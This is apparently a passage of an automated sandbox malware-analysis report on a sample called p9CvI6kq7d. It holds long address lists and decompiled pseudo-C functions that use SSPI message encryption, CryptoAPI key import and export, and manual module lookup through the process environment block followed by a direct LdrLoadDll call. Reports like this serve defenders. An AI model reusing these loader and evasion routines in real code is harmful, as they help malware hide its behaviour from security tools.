                            0x004014a1
                            0x004014b0
                            0x004014b0
                            0x004014b7
                            0x00401d72
                            0x00401d79
                            0x004022bd
                            0x004022c4
                            0x00402438
                            0x0040243f
                            0x00402621
                            0x00402621
                            0x00402621
                            0x00000000
                            0x00402627
                            0x00402621
                            0x00402463
                            0x00402465
                            0x00000000
                            0x00000000
                            0x0040247d
                            0x00402482
                            0x00402498
                            0x0040249d
                            0x0040249f
                            0x00000000
                            0x00000000
                            0x004024b1
                            0x004024b6
                            0x004024b8
                            0x00000000
                            0x00000000
                            0x004024be
                            0x004024c4
                            0x004024cb
                            0x004024d2
                            0x004024e5
                            0x004024f0
                            0x004024f1
                            0x004024f3
                            0x004024f5
                            0x004024fb
                            0x004024fc
                            0x004024fe
                            0x00402503
                            0x00402505
                            0x00000000
                            0x00000000
                            0x0040251b
                            0x00402520
                            0x00402522
                            0x00000000
                            0x00000000
                            0x00402528
                            0x0040252b
                            0x00402531
                            0x00402533
                            0x00402533
                            0x00402533
                            0x0040253c
                            0x00402541
                            0x00402548
                            0x00000000
                            0x00000000
                            0x0040254a
                            0x00402554
                            0x00402559
                            0x0040255c
                            0x00000000
                            0x00000000
                            0x00402567
                            0x00402570
                            0x00402573
                            0x00000000
                            0x0040261c
                            0x00402585
                            0x004025a8
                            0x004025aa
                            0x004025b3
                            0x004025b5
                            0x004025b7
                            0x004025c8
                            0x004025cd
                            0x004025d3
                            0x004025e4
                            0x004025e9
                            0x004025ef
                            0x004025f5
                            0x004025fa
                            0x004025fd
                            0x00402615
                            0x00402621
                            0x00402621
                            0x00402621
                            0x00000000
                            0x00402627
                            0x00402621
                            0x00000000
                            0x004024d2
                            0x00402328
                            0x0040232d
                            0x0040232f
                            0x00000000
                            0x00000000
                            0x00402340
                            0x00402345
                            0x0040234b
                            0x0040234e
                            0x00402352
                            0x00402356
                            0x0040235a
                            0x0040235e
                            0x00402378
                            0x00402378
                            0x0040237b
                            0x00000000
                            0x00000000
                            0x0040236f
                            0x00402377
                            0x00402377
                            0x00402377
                            0x0040238a
                            0x004023ac
                            0x004023c7
                            0x004023e2
                            0x004023e7
                            0x004023ed
                            0x004023ef
                            0x00000000
                            0x00000000
                            0x004023f5
                            0x004023f9
                            0x00000000
                            0x00000000
                            0x0040241c
                            0x00402421
                            0x00402423
                            0x00000000
                            0x00000000
                            0x00402429
                            0x0040242d
                            0x00000000
                            0x00000000
                            0x00402621
                            0x00402621
                            0x00402621
                            0x00000000
                            0x00402627
                            0x00402621
                            0x00401d7f
                            0x00401d86
                            0x00401d8d
                            0x004022a6
                            0x004022a6
                            0x004022aa
                            0x00000000
                            0x00000000
                            0x00401d9c
                            0x00401db9
                            0x00401dd5
                            0x00401dea
                            0x00401dfc
                            0x00401e0e
                            0x00401e13
                            0x00401ef9
                            0x00401ef9
                            0x00401efd
                            0x00000000
                            0x00000000
                            0x00401e24
                            0x00401e29
                            0x00401e5f
                            0x00401e64
                            0x00401e6b
                            0x00401e6d
                            0x00401ed7
                            0x00401ed7
                            0x00401edb
                            0x00401ef4
                            0x00401edd
                            0x00401ee0
                            0x00401ee5
                            0x00401ee5
                            0x00000000
                            0x00401edb
                            0x00401e83
                            0x00401ea1
                            0x00401ea6
                            0x00401ed2
                            0x00401ed2
                            0x00401ed5
                            0x00000000
                            0x00000000
                            0x00401eaa
                            0x00401eb2
                            0x00401eba
                            0x00000000
                            0x00401ed0
                            0x00401ebc
                            0x00401ec4
                            0x00401ec6
                            0x00401ec6
                            0x00401ecd
                            0x00401ecd
                            0x00000000
                            0x00401ed2
                            0x00401f03
                            0x00402299
                            0x00402299
                            0x0040229d
                            0x00000000
                            0x00000000
                            0x00401f18
                            0x00401f1d
                            0x00401f1e
                            0x00401f42
                            0x00401f44
                            0x00000000
                            0x00000000
                            0x00401fae
                            0x00401fb0
                            0x00402260
                            0x00402272
                            0x00402277
                            0x0040227a
                            0x0040227d
                            0x00402290
                            0x00402295
                            0x00402297
                            0x004022b5
                            0x00000000
                            0x004022b5
                            0x00000000
                            0x00402297
                            0x00401fc1
                            0x00401fc6
                            0x00401fcc
                            0x00401fd2
                            0x00401fd5
                            0x00401fd9
                            0x00401fe0
                            0x00402000
                            0x0040201b
                            0x00402036
                            0x0040203b
                            0x00402041
                            0x00402043
                            0x00000000
                            0x00000000
                            0x00402049
                            0x0040204d
                            0x00000000
                            0x00000000
                            0x00402070
                            0x00402075
                            0x00402077
                            0x00000000
                            0x00000000
                            0x0040207d
                            0x00402081
                            0x00000000
                            0x00000000
                            0x00402092
                            0x00402097
                            0x0040209d
                            0x004020a3
                            0x004020a6
                            0x004020aa
                            0x004020b1
                            0x004020ca
                            0x004020cf
                            0x004020d2
                            0x004020d2
                            0x004020d4
                            0x004020f4
                            0x0040210f
                            0x00402114
                            0x0040211b
                            0x00402122
                            0x00402129
                            0x0040212f
                            0x00402140
                            0x00402145
                            0x00402158
                            0x00402163
                            0x00402164
                            0x00402166
                            0x00402168
                            0x0040216e
                            0x0040216f
                            0x00402171
                            0x00402176
                            0x00402178
                            0x00000000
                            0x00000000
                            0x0040217e
                            0x00402180
                            0x00000000
                            0x00000000
                            0x00402196
                            0x0040219b
                            0x0040219d
                            0x00000000
                            0x00000000
                            0x004021a9
                            0x004021ac
                            0x004021af
                            0x004021b6
                            0x00000000
                            0x00000000
                            0x004021c4
                            0x004021d0
                            0x004021d5
                            0x004021df
                            0x004021e1
                            0x004021e1
                            0x004021e3
                            0x00000000
                            0x00000000
                            0x004021e9
                            0x00402255
                            0x00402255
                            0x00402259
                            0x00000000
                            0x00000000
                            0x004021f6
                            0x004021f8
                            0x0040224c
                            0x0040224c
                            0x00402252
                            0x00402252
                            0x00402252
                            0x00000000
                            0x00402252
                            0x00402218
                            0x0040221d
                            0x0040221f
                            0x00000000
                            0x00000000
                            0x00402225
                            0x0040222b
                            0x00000000
                            0x00000000
                            0x0040222d
                            0x00402233
                            0x00000000
                            0x00000000
                            0x00402239
                            0x00402242
                            0x00402247
                            0x00402249
                            0x00402249
                            0x00402249
                            0x00000000
                            0x00402249
                            0x0040225b
                            0x00000000
                            0x00402145
                            0x004022a3
                            0x004022a3
                            0x004022a3
                            0x004022a3
                            0x004014bd
                            0x004014d2
                            0x004014d5
                            0x004014d8
                            0x004014eb
                            0x004014eb
                            0x004014ef
                            0x00000000
                            0x00000000
                            0x004014e2
                            0x004014e3
                            0x004014e5
                            0x004014e7
                            0x004014e7
                            0x004014e8
                            0x004014e8
                            0x004014e8
                            0x004014e8
                            0x004014f1
                            0x00401508
                            0x00401517
                            0x0040151c
                            0x0040151e
                            0x00000000
                            0x00000000
                            0x0040153c
                            0x00401541
                            0x00401547
                            0x004015fd
                            0x004015fd
                            0x00401600
                            0x00000000
                            0x00000000
                            0x00401602
                            0x00401606
                            0x0040155c
                            0x0040155c
                            0x0040155e
                            0x00000000
                            0x00000000
                            0x00401564
                            0x00401574
                            0x00401579
                            0x0040157b
                            0x00000000
                            0x00000000
                            0x00401581
                            0x00401591
                            0x00401596
                            0x00401598
                            0x00000000
                            0x00000000
                            0x0040159e
                            0x004015ae
                            0x004015b3
                            0x004015b5
                            0x00000000
                            0x00000000
                            0x004015bc
                            0x004015be
                            0x004015c0
                            0x004015cc
                            0x004015d1
                            0x004015d3
                            0x00000000
                            0x00000000
                            0x004015dc
                            0x004015ec
                            0x004015f1
                            0x004015f3
                            0x00000000
                            0x00000000
                            0x004015f9
                            0x004015fc
                            0x004015fc
                            0x00000000
                            0x004015fc
                            0x00000000
                            0x00401606
                            0x00401bc7
                            0x00401bc7
                            0x00401bca
                            0x00000000
                            0x00000000
                            0x00401611
                            0x00401674
                            0x00401679
                            0x0040167b
                            0x00401bad
                            0x00401bbf
                            0x00401bc4
                            0x00401bc4
                            0x00401bc4
                            0x00000000
                            0x00401bc4
                            0x004016a2
                            0x004016a7
                            0x004016a8
                            0x004016aa
                            0x004016b1
                            0x004016b7
                            0x004016bc
                            0x004016c8
                            0x004016cd
                            0x004016d3
                            0x004016ed
                            0x0040170b
                            0x0040172a
                            0x0040172f
                            0x00401731
                            0x00402629
                            0x00402635
                            0x0040263a
                            0x00000000
                            0x0040263a
                            0x00401737
                            0x0040173d
                            0x00401753
                            0x00401758
                            0x0040175f
                            0x00401766
                            0x0040176f
                            0x00401779
                            0x00401783
                            0x004017b3
                            0x004017b8
                            0x004017b9
                            0x004017c7
                            0x004017cc
                            0x004017e4
                            0x004017f0
                            0x004017f6
                            0x00401800
                            0x00401800
                            0x00401800
                            0x00401802
                            0x00000000
                            0x00000000
                            0x004017fa
                            0x004017fb
                            0x004017fd
                            0x004017ff
                            0x004017ff
                            0x004017fd
                            0x00401804
                            0x0040181c
                            0x0040183b
                            0x00401840
                            0x00401853
                            0x0040185b
                            0x00401862
                            0x00401863
                            0x00401865
                            0x00401870
                            0x00401871
                            0x00401873
                            0x00401875
                            0x0040187a
                            0x00401884
                            0x0040188e
                            0x00401898
                            0x004018a2
                            0x004018ac
                            0x004018bc
                            0x004018be
                            0x004018d7
                            0x004018dc
                            0x004018de
                            0x004018e9
                            0x004018f0
                            0x004018f7
                            0x004018f8
                            0x004018fa
                            0x00401912
                            0x0040191f
                            0x00401924
                            0x0040192a
                            0x00401930
                            0x00401933
                            0x00401937
                            0x00401940
                            0x00401943
                            0x0040195d
                            0x00401968
                            0x0040196e
                            0x00401978
                            0x00401982
                            0x00401987
                            0x00401988
                            0x00401990
                            0x00401991
                            0x00401993
                            0x0040199b
                            0x0040199c
                            0x004019a4
                            0x004019a5
                            0x004019c0
                            0x004019cd
                            0x004019d2
                            0x004019dc
                            0x004019e6
                            0x00401a00
                            0x00401a05
                            0x00401a07
                            0x00401a0f
                            0x00401a10
                            0x00401a12
                            0x00401a1a
                            0x00401a21
                            0x00401a22
                            0x00401a24
                            0x00401a3c
                            0x00401a51
                            0x00401a6a
                            0x00401a7a
                            0x00401a9c
                            0x00401ab7
                            0x00401ad2
                            0x00401ad7
                            0x00401add
                            0x00401adf
                            0x00000000
                            0x00000000
                            0x00401ae5
                            0x00401ae9
                            0x00000000
                            0x00000000
                            0x00401b0c
                            0x00401b11
                            0x00401b13
                            0x00000000
                            0x00000000
                            0x00401b19
                            0x00401b1d
                            0x00000000
                            0x00000000
                            0x00401b43
                            0x00401b48
                            0x00401b4a
                            0x00000000
                            0x00000000
                            0x00401b63
                            0x00401b9b
                            0x00401ba0
                            0x00401ba2
                            0x00000000
                            0x00000000
                            0x00401ba8
                            0x00000000
                            0x00401ba8
                            0x00401bd0
                            0x00401bd2
                            0x00000000
                            0x00000000
                            0x00401be3
                            0x00401be8
                            0x00401bee
                            0x00401bf1
                            0x00401bf5
                            0x00401bf9
                            0x00401c00
                            0x00401c03
                            0x00401c13
                            0x00401c25
                            0x00401c2a
                            0x00401c3a
                            0x00401c4b
                            0x00401c5a
                            0x00401c80
                            0x00401c9b
                            0x00401cb6
                            0x00401cbb
                            0x00401cc1
                            0x00401cc3
                            0x00000000
                            0x00000000
                            0x00401cc9
                            0x00401ccd
                            0x00000000
                            0x00000000
                            0x00401cf4
                            0x00401cf9
                            0x00401cfb
                            0x00000000
                            0x00000000
                            0x00401d01
                            0x00401d05
                            0x00401d14
                            0x00401d28
                            0x00401d3a
                            0x00401d4b
                            0x00401d59
                            0x00401d5e
                            0x00401d5e
                            0x00401d05
                            0x00000000
                            0x004014b7
                            0x004014a3
                            0x004014aa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004014aa
                            0x0040145d
                            0x00401460
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401460
                            0x0040144b
                            0x0040144e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040144e
                            0x00401439
                            0x0040143c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040143c
                            0x00401427
                            0x0040142a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040142a
                            0x00402651
                            0x00402651
                            0x0040265f
                            0x00402661
                            0x00402661
                            0x00402674
                            0x00402679
                            0x00402680
                            0x0040268e
                            0x00402690
                            0x00402697
                            0x00402697
                            0x004026ab
                            0x004026b5
                            0x004026ba
                            0x004026c1
                            0x004026c3
                            0x004026c5
                            0x004026dd
                            0x004026dd
                            0x004026df
                            0x004026e1
                            0x004026f9
                            0x004026fb
                            0x004026fd
                            0x00402715
                            0x00402723
                            0x0040272f
                            0x0040273b
                            0x00402747
                            0x00402753
                            0x00402762
                            0x00402762

                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00401508
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040153C
                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,00000000,?), ref: 004026B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$BinaryString$ContextRelease
                            • String ID: BCryptCloseAlgorithmProvider$bcrypt.dll
                            • API String ID: 1374739491-1199799005
                            • Opcode ID: b9190c15976ec14e801de932b40a9fed5819db8612a563bdea162a634e1d7df9
                            • Instruction ID: a3bcb3cc96b32fac7b04d8a52f10e2b1532277f458af079fd4dfda013e4cfbfd
                            • Opcode Fuzzy Hash: b9190c15976ec14e801de932b40a9fed5819db8612a563bdea162a634e1d7df9
                            • Instruction Fuzzy Hash: 7E213471D40218AADF11ABE1CD0ABDD7678EF08304F1044AAF205751C1CB7E9F949F19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00404484(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				void* _v28;
                            				char* _v32;
                            				long _v36;
                            				void* _v40;
                            				void* _v44;
                            				void* _v48;
                            				void* _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				char _v80;
                            				intOrPtr _v84;
                            				char _v88;
                            				char _v92;
                            				void* _t53;
                            				void* _t58;
                            				intOrPtr _t80;
                            				void* _t86;
                            
                            				_t53 = E004066D2( &_v92,  &_v16 - _t86);
                            				while(_a12 > 0) {
                            					_push( &_v24);
                            					_push(4);
                            					_push(_a20);
                            					L00407202();
                            					_t53 = VirtualAlloc(0, _v24 + _v16 + _v20, 0x3000, 4);
                            					if(_t53 != 0) {
                            						_v28 = _t53;
                            						_t58 = _t53 + _v24;
                            						_t80 = _a12;
                            						if(_v16 <= _t80) {
                            							_t80 = _v16;
                            						}
                            						_v92 = _v92 + _t80;
                            						_a12 = _a12 - _t80;
                            						E0040664B(_a8 + _v92, _t58, _t80);
                            						E0040664B( &_v24,  &_v88, 4);
                            						_v84 = 7;
                            						E0040664B( &_v28,  &_v80, 4);
                            						_v76 = _t80;
                            						_v72 = 1;
                            						_v68 = _v28 + _v24;
                            						E0040664B( &_v20,  &_v64, 4);
                            						_v60 = 6;
                            						_v56 = _v28 + _v24 + _t80;
                            						_v52 = 0;
                            						_v48 = 0;
                            						_v44 = 0;
                            						_v32 =  &_v88;
                            						_v40 = 0;
                            						_v36 = 4;
                            						_push(0);
                            						_push( &_v40);
                            						_push(0);
                            						_push(_a20);
                            						L004071D8();
                            						E004062FA(_a4, _v28, _v88 + _v76 + _v64, _a16);
                            						_t53 = E004048E1( &_v28);
                            						continue;
                            					}
                            					break;
                            				}
                            				return _t53;
                            			}



























                            0x00404498
                            0x004045a8
                            0x004044a5
                            0x004044a6
                            0x004044a8
                            0x004044ab
                            0x004044c3
                            0x004044ca
                            0x004044d0
                            0x004044d3
                            0x004044d6
                            0x004044dc
                            0x004044de
                            0x004044de
                            0x004044e7
                            0x004044ea
                            0x004044f0
                            0x004044ff
                            0x00404504
                            0x00404515
                            0x0040451a
                            0x0040451d
                            0x0040452a
                            0x00404537
                            0x0040453c
                            0x0040454b
                            0x0040454e
                            0x00404555
                            0x0040455c
                            0x00404566
                            0x00404569
                            0x00404570
                            0x00404577
                            0x0040457c
                            0x0040457d
                            0x0040457f
                            0x00404582
                            0x0040459a
                            0x004045a3
                            0x00000000
                            0x004045a3
                            0x00000000
                            0x004044ca
                            0x004045b6

                            APIs
                            • QueryContextAttributesA.SECUR32(?,00000004,?,?,?,?,?,?), ref: 004044AB
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000004,?,?,?,?,?,?), ref: 004044C3
                            • EncryptMessage.SECUR32(?,00000000,?,00000000,?,?,00000004,?,?,00000004,?,?,00000004,?,?,?), ref: 00404582
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocAttributesContextEncryptMessageQueryVirtual
                            • String ID:
                            • API String ID: 2600646408-0
                            • Opcode ID: ab59b1a01ab19821842703bcd51a5c7cff8532c3778612b7a4b30717481346dd
                            • Instruction ID: eee12982e2d51957c8a3b09d7459633cb1edb388ed5fd6c337225e1fd8a4fe53
                            • Opcode Fuzzy Hash: ab59b1a01ab19821842703bcd51a5c7cff8532c3778612b7a4b30717481346dd
                            • Instruction Fuzzy Hash: 9B41DDB1D00209ABDF04DFD5CD86BEEB7B8EF04308F10442AE611B6281D779AA55CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00403E30(long* _a4, BYTE* _a8, intOrPtr _a12) {
                            				long* _v8;
                            				char _v12;
                            				char _v16;
                            				char _v125;
                            				char _v268;
                            				char* _t18;
                            				void* _t22;
                            				void* _t25;
                            
                            				E004066D2( &_v268,  &_v16 - _t25);
                            				CryptImportKey(_a4, _a8, 0x190, 0, 1,  &_v8);
                            				_v12 = 0x90;
                            				_push( &_v12);
                            				_t18 =  &_v268;
                            				_push(_t18);
                            				_push(0);
                            				_push(6);
                            				_push(0);
                            				_push(_v8);
                            				L00407124();
                            				E00406605( &_v125, _a12, 0x80);
                            				CryptDestroyKey(_v8);
                            				_t22 = _t18;
                            				return _t22;
                            			}











                            0x00403e47
                            0x00403e5f
                            0x00403e64
                            0x00403e6e
                            0x00403e6f
                            0x00403e75
                            0x00403e76
                            0x00403e78
                            0x00403e7a
                            0x00403e7c
                            0x00403e7f
                            0x00403e91
                            0x00403e99
                            0x00403e9e
                            0x00403ea3

                            APIs
                            • CryptImportKey.ADVAPI32(?,?,00000190,00000000,00000001,?,?,?,?,?), ref: 00403E5F
                            • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,?,?,?,00000190,00000000,00000001,?,?,?,?,?), ref: 00403E7F
                            • CryptDestroyKey.ADVAPI32(?,?,?,00000080,00000000,?,00000000,00000006,00000000,?,?,?,?,00000190,00000000,00000001), ref: 00403E99
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$DestroyExportImport
                            • String ID:
                            • API String ID: 2547721435-0
                            • Opcode ID: 47ef0168141b03367853a52314189065d96da1280b9e7cdc991604c9b9823f28
                            • Instruction ID: d9dbee07c606b4edab87cf3dc6b1a480327e1780b5cf4342560dd656187287a0
                            • Opcode Fuzzy Hash: 47ef0168141b03367853a52314189065d96da1280b9e7cdc991604c9b9823f28
                            • Instruction Fuzzy Hash: 38018172900208BAEF11DB91CC42FDF777CEB40704F10446AB601BA0D1EA75A7249B68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E004045B9(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				void* _v8;
                            				void* _v12;
                            				char _v16;
                            				long _v20;
                            				char* _v24;
                            				long _v28;
                            				void* _v32;
                            				void* _v36;
                            				void* _v40;
                            				void* _v44;
                            				void* _v48;
                            				void* _v52;
                            				void* _v56;
                            				void* _v60;
                            				void* _v64;
                            				void* _v68;
                            				char _v72;
                            				signed int _v76;
                            				char _v80;
                            				signed int _v84;
                            				void* _v88;
                            				void* _t71;
                            				void* _t77;
                            				signed int _t78;
                            				signed int _t86;
                            				signed int _t88;
                            				signed int _t92;
                            				intOrPtr _t101;
                            				signed int* _t102;
                            				void* _t103;
                            				void* _t104;
                            
                            				E004066D2( &_v88,  &_v16 - _t104);
                            				E004066D2(_a8, 4);
                            				_t101 = _a8;
                            				_v20 = 0x8000;
                            				_t71 = VirtualAlloc(0, _v20, 0x3000, 4);
                            				if(_t71 == 0) {
                            					L28:
                            					E004048E1(_a8);
                            					_v88 = 0;
                            					goto L29;
                            				} else {
                            					_v8 = _t71;
                            					goto L2;
                            					do {
                            						do {
                            							L2:
                            							if(_v12 == 0 || _v84 == 0x80090318) {
                            								while(1) {
                            									_t77 = _v8 + _v12;
                            									_t96 = _v20 != _v12;
                            									if(_v20 != _v12) {
                            										break;
                            									}
                            									_v20 = _v20 + 0x8000;
                            									if(E00404878( &_v8, _v12, _v20) == 0) {
                            										goto L28;
                            									} else {
                            										continue;
                            									}
                            								}
                            								_t78 = E004063CD(__eflags, _a4, _t77, _t96, 0);
                            								__eflags = _t78;
                            								if(_t78 <= 0) {
                            									goto L28;
                            								}
                            								_t20 =  &_v12;
                            								 *_t20 = _v12 + _t78;
                            								__eflags =  *_t20;
                            							}
                            							E0040664B( &_v12,  &_v80, 4);
                            							_v76 = 1;
                            							E0040664B( &_v8,  &_v72, 4);
                            							_v68 = 0;
                            							_v64 = 0;
                            							_v60 = 0;
                            							_v56 = 0;
                            							_v52 = 0;
                            							_v48 = 0;
                            							_v44 = 0;
                            							_v40 = 0;
                            							_v36 = 0;
                            							_v24 =  &_v80;
                            							_v32 = 0;
                            							_v28 = 4;
                            							_push(0);
                            							_push(0);
                            							_t86 =  &_v32;
                            							_push(_t86);
                            							_push(_a12);
                            							L004071CC();
                            							_v84 = _t86;
                            							__eflags = _v84 - 0x80090318;
                            						} while (__eflags == 0);
                            						__eflags = _v84 - 0x90317;
                            						if(_v84 == 0x90317) {
                            							L14:
                            							_v12 = 0;
                            							_t92 = 1;
                            							while(1) {
                            								__eflags = _t92 - 3;
                            								if(_t92 > 3) {
                            									goto L26;
                            								}
                            								_t102 = _t103 + _t92 * 0xc - 0x4c;
                            								__eflags = _t102[1] - 1;
                            								if(_t102[1] != 1) {
                            									L20:
                            									__eflags = _t102[1] - 5;
                            									if(_t102[1] == 5) {
                            										__eflags = _t102[2];
                            										if(_t102[2] != 0) {
                            											__eflags =  *_t102;
                            											if( *_t102 != 0) {
                            												_t59 =  &_v12;
                            												 *_t59 = _v12 +  *_t102;
                            												__eflags =  *_t59;
                            												_v84 = 0x90312;
                            												E0040664B(_t102[2], _v8 + _v12,  *_t102);
                            											}
                            										}
                            									}
                            									L24:
                            									_t92 = _t92 + 1;
                            									__eflags = _t92;
                            									continue;
                            								}
                            								__eflags = _t102[2];
                            								if(_t102[2] == 0) {
                            									goto L20;
                            								}
                            								__eflags =  *_t102;
                            								if( *_t102 == 0) {
                            									goto L20;
                            								}
                            								_t88 = E00404842(_t101, _v88, _t102[2],  *_t102);
                            								__eflags = _t88;
                            								if(_t88 == 0) {
                            									goto L28;
                            								}
                            								_v88 = _v88 +  *_t102;
                            								goto L24;
                            							}
                            							goto L26;
                            						}
                            						__eflags = _v84 - 0x90321;
                            						if(_v84 != 0x90321) {
                            							__eflags = _t86;
                            							if(_t86 != 0) {
                            								goto L28;
                            							}
                            							goto L14;
                            						}
                            						goto L28;
                            						L26:
                            						__eflags = _v84 - 0x90312;
                            					} while (__eflags == 0);
                            					L29:
                            					E004048E1( &_v8);
                            					return _v88;
                            				}
                            			}


































                            0x004045cd
                            0x004045d7
                            0x004045dc
                            0x004045df
                            0x004045f2
                            0x004045f9
                            0x00404792
                            0x00404795
                            0x0040479a
                            0x00000000
                            0x004045ff
                            0x004045ff
                            0x004045ff
                            0x00404602
                            0x00404602
                            0x00404602
                            0x00404606
                            0x00404611
                            0x00404614
                            0x0040461a
                            0x0040461f
                            0x00000000
                            0x00000000
                            0x00404621
                            0x00404639
                            0x00000000
                            0x0040463f
                            0x00000000
                            0x0040463f
                            0x00404639
                            0x00404648
                            0x0040464d
                            0x0040464f
                            0x00000000
                            0x00000000
                            0x00404655
                            0x00404655
                            0x00404655
                            0x00404655
                            0x00404662
                            0x00404667
                            0x00404678
                            0x0040467d
                            0x00404684
                            0x0040468b
                            0x00404692
                            0x00404699
                            0x004046a0
                            0x004046a7
                            0x004046ae
                            0x004046b5
                            0x004046bf
                            0x004046c2
                            0x004046c9
                            0x004046d0
                            0x004046d2
                            0x004046d4
                            0x004046d7
                            0x004046d8
                            0x004046db
                            0x004046e0
                            0x004046e3
                            0x004046e3
                            0x004046f0
                            0x004046f7
                            0x00404710
                            0x00404710
                            0x00404717
                            0x0040477e
                            0x0040477e
                            0x00404781
                            0x00000000
                            0x00000000
                            0x00404721
                            0x00404725
                            0x00404729
                            0x0040474f
                            0x0040474f
                            0x00404753
                            0x00404755
                            0x00404759
                            0x0040475b
                            0x0040475e
                            0x00404768
                            0x00404768
                            0x00404768
                            0x0040476b
                            0x00404778
                            0x00404778
                            0x0040475e
                            0x00404759
                            0x0040477d
                            0x0040477d
                            0x0040477d
                            0x00000000
                            0x0040477d
                            0x0040472b
                            0x0040472f
                            0x00000000
                            0x00000000
                            0x00404731
                            0x00404734
                            0x00000000
                            0x00000000
                            0x0040473f
                            0x00404744
                            0x00404746
                            0x00000000
                            0x00000000
                            0x0040474a
                            0x00000000
                            0x0040474a
                            0x00000000
                            0x0040477e
                            0x004046f9
                            0x00404700
                            0x00404707
                            0x0040470a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040470a
                            0x00000000
                            0x00404783
                            0x00404783
                            0x00404783
                            0x004047a1
                            0x004047a5
                            0x004047b1
                            0x004047b1

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000004,?,?,?,?,?), ref: 004045F2
                            • DecryptMessage.SECUR32(?,?,00000000,00000000,?,?,00000004,?,?,00000004,?,?,?,00000000,00000000,?), ref: 004046DB
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocDecryptMessageVirtual
                            • String ID:
                            • API String ID: 2757997683-0
                            • Opcode ID: 9c1034e736afe9bd04a7ae1292a8672294028fbc275a0fdf586c10c311b5fd53
                            • Instruction ID: 6054cd12bd7a1c9eb0d3f2c829b11d2235dc207f7a089d3780c5f6c356e1957b
                            • Opcode Fuzzy Hash: 9c1034e736afe9bd04a7ae1292a8672294028fbc275a0fdf586c10c311b5fd53
                            • Instruction Fuzzy Hash: B7511BB1800208EBDF20DFD5C845BEEBBB8FF45308F10892AE651762D0D7799A54DB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00406DF2(intOrPtr _a4) {
                            				char* _v8;
                            				short _v10;
                            				char _v12;
                            				char _v16;
                            				char _v268;
                            				char _v272;
                            				char _v1296;
                            				intOrPtr _t31;
                            				intOrPtr _t34;
                            				short _t37;
                            				intOrPtr _t45;
                            				void* _t48;
                            				char* _t49;
                            				intOrPtr* _t50;
                            				intOrPtr* _t51;
                            				void* _t52;
                            
                            				E004066D2( &_v1296,  &_v16 - _t52);
                            				E004066E9(_a4, 0xffffffff,  &_v1296);
                            				_t49 =  &_v1296;
                            				_t31 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                            				_t51 =  *((intOrPtr*)(_t31 + 0xc));
                            				_t45 =  *((intOrPtr*)(_t31 + 0x10));
                            				do {
                            					_t51 =  *_t51;
                            					_t50 =  *((intOrPtr*)(_t51 + 0x30));
                            					_t48 = 0;
                            					while( *((char*)(_t48 + _t49)) != 0) {
                            						_t34 =  *_t50;
                            						if(_t34 < 0x41 || _t34 > 0x5a) {
                            							__eflags = _t34 - 0x61;
                            							if(__eflags >= 0) {
                            								__eflags = _t34 - 0x7a;
                            								if(__eflags <= 0) {
                            									_t34 = _t34 - 0x20;
                            									__eflags = _t34;
                            								}
                            							}
                            						} else {
                            							_t34 = _t34 + 0x20;
                            						}
                            						if( *((intOrPtr*)(_t48 + _t49)) == _t34 ||  *((intOrPtr*)(_t48 + _t49)) == _t34) {
                            							_t50 = _t50 + 2;
                            							_t48 = _t48 + 1;
                            							continue;
                            						} else {
                            							goto L11;
                            						}
                            					}
                            					return  *((intOrPtr*)(_t51 + 0x18));
                            					L11:
                            					_t60 = _t51 - _t45;
                            				} while (_t51 != _t45);
                            				_t37 = E004068D9(_t60,  &_v1296,  &_v268);
                            				_v12 = _t37;
                            				_v10 = _t37;
                            				_v10 = _v10 + 2;
                            				_v8 =  &_v268;
                            				_v272 = 0;
                            				_push( &_v272);
                            				_push( &_v12);
                            				_push(0);
                            				_push(0);
                            				 *((intOrPtr*)(E00406EE2(_t60, E00406DF2("ntdll.dll"), "LdrLoadDll")))();
                            				return _v272;
                            			}



















                            0x00406e09
                            0x00406e1a
                            0x00406e1f
                            0x00406e2b
                            0x00406e2e
